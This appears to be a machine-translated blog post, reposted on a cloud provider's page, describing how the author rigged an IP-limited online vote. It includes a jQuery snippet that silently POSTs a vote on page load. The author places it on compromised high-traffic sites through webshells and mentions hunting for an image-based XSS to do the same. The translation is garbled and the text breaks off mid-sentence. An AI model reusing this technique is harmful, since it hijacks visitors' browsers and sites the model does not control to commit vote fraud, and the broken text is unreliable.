Webshell + xss click a vote

Source: Internet
Author: User

A member of the team sent a voting address, which required a vote from a website named XX. The ip address was restricted and the post packet was displayed.

Find a large-volume shell post data.
Js Code
<Script type = "text/javascript" src = "http://code.jquery.com/jquery-latest.js"> </script>

2 <script type = "text/javascript">

3 $ (document). ready (function (e ){

4 var timestamp = (new Date (). valueOf ();

5 $. post ("http://www.xxx.com/vote.json? T = "+ timestamp, {itemId: 10072 });

6 });

Check that firebug post has been successful.

It is estimated that the road has come. I have to submit it from this site. It seems that I have to seek the xss cooperation on this site and start to pick it up. I saw a blog with rich texts. After some fuzz, I found an image-type xss.

Find a large-traffic webshell Iframe page, but the sky is dark, then the first evil bib


Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.